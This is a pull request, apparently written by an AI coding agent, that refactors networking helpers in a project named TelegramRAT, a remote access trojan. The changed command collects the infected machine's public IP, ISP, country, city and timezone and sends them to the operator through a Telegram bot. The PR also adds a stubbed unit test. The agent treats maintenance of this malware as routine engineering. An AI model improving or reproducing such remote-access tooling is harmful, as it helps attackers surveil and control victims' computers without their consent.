### PR TITLE
Refactor network helpers to reuse HttpClient

### DIFF
--- a/Commands/CommandRegistry.cs
+++ b/Commands/CommandRegistry.cs
@@ -1459,22 +1459,15 @@ public static class CommandRegistry
             Execute = async model =>
             {
                 var ipAddress = await Utils.GetIpAddressAsync();
-                HttpClient httpClient = new HttpClient();
-                string ipApiResponse = await httpClient.GetStringAsync("http://ip-api.com/xml/" + ipAddress);
-                System.Xml.XmlDocument xmlDocument = new System.Xml.XmlDocument();
-                xmlDocument.LoadXml(ipApiResponse);
-
-                TextReader xmlDocumentReader = new StringReader(xmlDocument.ChildNodes[1].OuterXml);
-                var serializer = new System.Xml.Serialization.XmlSerializer(typeof(NetworkInfo));
-                NetworkInfo ni = serializer.Deserialize(xmlDocumentReader) as NetworkInfo;
+                var networkInfo = await Utils.GetFromJsonAsync<NetworkInfo>("http://ip-api.com/json/" + ipAddress);
 
                 string networkInformationString = "Network information:\n\n" +
                 $"IP: {ipAddress}\n" +
-                $"ISP: {ni.Isp}\n" +
-                $"Country: {ni.Country}\n" +
-                $"City: {ni.City}\n" +
-                $"Timezone: {ni.Timezone}\n" +
-                $"Country Code: {ni.CountryCode}";
+                $"ISP: {networkInfo.Isp}\n" +
+                $"Country: {networkInfo.Country}\n" +
+                $"City: {networkInfo.City}\n" +
+                $"Timezone: {networkInfo.Timezone}\n" +
+                $"Country Code: {networkInfo.CountryCode}";
 
                 await Program.Bot.SendMessage(model.Message.Chat.Id, networkInformationString);
             }

--- a/Features/NetworkInfo.cs
+++ b/Features/NetworkInfo.cs
@@ -1,4 +1,5 @@
-﻿using System.Xml.Serialization;
+using System.Text.Json.Serialization;
+using System.Xml.Serialization;
 
 namespace TelegramRAT.Features;
 
@@ -6,44 +7,58 @@ namespace TelegramRAT.Features;
 public class NetworkInfo
 {
     [XmlElement(ElementName = "status")]
+    [JsonPropertyName("status")]
     public string Status { get; set; }
 
     [XmlElement(ElementName = "country")]
+    [JsonPropertyName("country")]
     public string Country { get; set; }
 
     [XmlElement(ElementName = "countryCode")]
+    [JsonPropertyName("countryCode")]
     public string CountryCode { get; set; }
 
     [XmlElement(ElementName = "region")]
+    [JsonPropertyName("region")]
     public string Region { get; set; }
 
     [XmlElement(ElementName = "regionName")]
+    [JsonPropertyName("regionName")]
     public string RegionName { get; set; }
 
     [XmlElement(ElementName = "city")]
+    [JsonPropertyName("city")]
     public string City { get; set; }
 
     [XmlElement(ElementName = "zip")]
+    [JsonPropertyName("zip")]
     public string Zip { get; set; }
 
     [XmlElement(ElementName = "lat")]
+    [JsonPropertyName("lat")]
     public string Lat { get; set; }
 
     [XmlElement(ElementName = "lon")]
+    [JsonPropertyName("lon")]
     public string Lon { get; set; }
 
     [XmlElement(ElementName = "timezone")]
+    [JsonPropertyName("timezone")]
     public string Timezone { get; set; }
 
     [XmlElement(ElementName = "isp")]
+    [JsonPropertyName("isp")]
     public string Isp { get; set; }
 
     [XmlElement(ElementName = "org")]
+    [JsonPropertyName("org")]
     public string Org { get; set; }
 
     [XmlElement(ElementName = "as")]
+    [JsonPropertyName("as")]
     public string As { get; set; }
 
     [XmlElement(ElementName = "query")]
+    [JsonPropertyName("query")]
     public string Query { get; set; }
 }

--- a/TelegramRAT.Tests/UtilsTests.cs
+++ b/TelegramRAT.Tests/UtilsTests.cs
@@ -1,0 +1,74 @@
+using System;
+using System.Collections.Generic;
+using System.Net;
+using System.Net.Http;
+using System.Text;
+using System.Threading;
+using System.Threading.Tasks;
+using TelegramRAT.Features;
+using TelegramRAT.Utilities;
+using Xunit;
+
+namespace TelegramRAT.Tests;
+
+public class UtilsTests
+{
+    [Fact]
+    public async Task SharedHttpClient_ReusesAcrossRequestsAndParsesJson()
+    {
+        var responses = new Dictionary<string, string>
+        {
+            ["https://api.ipify.org/?format=json"] = "{\"ip\":\"203.0.113.42\"}",
+            ["http://ip-api.com/json/203.0.113.42"] = "{\"status\":\"success\",\"isp\":\"ExampleISP\",\"country\":\"Wonderland\",\"city\":\"Fictionville\",\"timezone\":\"UTC+0\",\"countryCode\":\"WL\"}"
+        };
+
+        var handler = new StubHttpMessageHandler(responses);
+        var httpClient = new HttpClient(handler)
+        {
+            Timeout = TimeSpan.FromSeconds(10)
+        };
+
+        using (Utils.OverrideHttpClient(httpClient))
+        {
+            var ipAddress = await Utils.GetIpAddressAsync();
+            var networkInfo = await Utils.GetFromJsonAsync<NetworkInfo>("http://ip-api.com/json/" + ipAddress);
+
+            Assert.Equal("203.0.113.42", ipAddress);
+            Assert.Equal("ExampleISP", networkInfo.Isp);
+            Assert.Equal("Wonderland", networkInfo.Country);
+            Assert.Equal("Fictionville", networkInfo.City);
+            Assert.Equal("UTC+0", networkInfo.Timezone);
+            Assert.Equal("WL", networkInfo.CountryCode);
+        }
+
+        Assert.Equal(2, handler.RequestCount);
+    }
+
+    private sealed class StubHttpMessageHandler : HttpMessageHandler
+    {
+        private readonly IDictionary<string, string> _responses;
+
+        public StubHttpMessageHandler(IDictionary<string, string> responses)
+        {
+            _responses = responses;
+        }
+
+        public int RequestCount { get; private set; }
+
+        protected override Task<HttpResponseMessage> SendAsync(HttpRequestMessage request, CancellationToken cancellationToken)
+        {
+            RequestCount++;
+            var uri = request.RequestUri!.ToString();
+
+            if (_responses.TryGetValue(uri, out var content))
+            {
+                return Task.FromResult(new HttpResponseMessage(HttpStatusCode.OK)
+                {
+                    Content = new StringContent(content, Encoding.UTF8, "application/json")
+                });
+            }
+
+            return Task.FromResult(new HttpResponseMessage(HttpStatusCode.NotFound));
+        }
+    }
+}


### PR DESCRIPTION
## Summary
- add a shared HttpClient factory in Utils with JSON helper methods and proper timeouts
- parse the public IP and ip-api responses with System.Text.Json and reuse the shared client
- adjust NetworkInfo for JSON deserialization and add a test covering multiple helper calls

## Testing
- dotnet test *(fails: dotnet CLI is not available in the execution environment)*

------
https://chatgpt.com/codex/tasks/task_e_68f6a252e9c8832ba3d3af4f8fd6acda